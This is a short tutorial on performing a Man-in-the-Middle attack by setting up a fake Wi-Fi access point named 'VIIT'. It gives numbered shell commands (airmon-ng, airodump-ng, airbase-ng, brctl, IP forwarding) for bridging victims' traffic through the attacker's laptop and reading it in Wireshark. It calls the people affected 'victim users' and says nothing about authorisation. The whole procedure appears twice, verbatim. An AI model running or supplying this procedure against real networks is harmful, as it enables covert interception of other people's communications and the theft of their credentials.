In this tutorial we will perform MITM attack.
To perform Man-in-the-Middle (MITM) attack, we will create a fake access point on or laptop and monitor traffic of victim users connected to our laptop. We forward traffic of victim users to the servers therefore, they will be able to access resources on the network. Whereas all there access occurs through our laptop, hence we will be able to see all their communications.
Steps to perform MITM attack:
1. First check for wireless devices on your computer.
$ airmon-ng
2. Now create a Wireless monitoring interfaces:
$ airmon-ng start wlan0
3. Monitor what's on the wireless network such as access points in the neighborhood, wireless devices, channel used, etc
$ airodump-ng mon0
4. Create and launch our own access point (fake access point)
$ airbase-ng --essid VIIT -c 11 mon0
SSID of our access point will be "VIIT" and it is running on channel 11.
5. Verfiy details of logical access point interface
$ ifconfig at0
6. Create a bridge interface
$ brctl addbr myBridge
7. Now, associate real interfaces (eth0 and at0) to bridge interfaces
$ brctl addif myBridge eth0
$ brctl addif myBridge at0
8. Verfiy details of new bridge interface
$ brctl show
9. Remove the IP address of eth0 and at0 interfaces
$ ifconfig eth0 0.0.0.0 up
$ ifconfig at0 0.0.0.0 up
10. Assign IP address to bridge interface we have created earlier. You can use your old eth0 IP address or assign any IP free address on your network
$ ifconfig myBridge 10.10.10.1/8 up
11. Enable IP forwarding on your computer. In other word, your computer will work as a router. IT will perform NATing.
$ echo 1 > /proc/sys/net/ipv4/ip_forward
12. Now use Wireshark tool and monitor traffic of users associated with your fake wireless Access point.
To perform Man-in-the-Middle (MITM) attack, we will create a fake access point on or laptop and monitor traffic of victim users connected to our laptop. We forward traffic of victim users to the servers therefore, they will be able to access resources on the network. Whereas all there access occurs through our laptop, hence we will be able to see all their communications.
Steps to perform MITM attack:
1. First check for wireless devices on your computer.
$ airmon-ng
2. Now create a Wireless monitoring interfaces:
$ airmon-ng start wlan0
3. Monitor what's on the wireless network such as access points in the neighborhood, wireless devices, channel used, etc
$ airodump-ng mon0
4. Create and launch our own access point (fake access point)
$ airbase-ng --essid VIIT -c 11 mon0
SSID of our access point will be "VIIT" and it is running on channel 11.
5. Verfiy details of logical access point interface
$ ifconfig at0
6. Create a bridge interface
$ brctl addbr myBridge
7. Now, associate real interfaces (eth0 and at0) to bridge interfaces
$ brctl addif myBridge eth0
$ brctl addif myBridge at0
8. Verfiy details of new bridge interface
$ brctl show
9. Remove the IP address of eth0 and at0 interfaces
$ ifconfig eth0 0.0.0.0 up
$ ifconfig at0 0.0.0.0 up
10. Assign IP address to bridge interface we have created earlier. You can use your old eth0 IP address or assign any IP free address on your network
$ ifconfig myBridge 10.10.10.1/8 up
11. Enable IP forwarding on your computer. In other word, your computer will work as a router. IT will perform NATing.
$ echo 1 > /proc/sys/net/ipv4/ip_forward
12. Now use Wireshark tool and monitor traffic of users associated with your fake wireless Access point.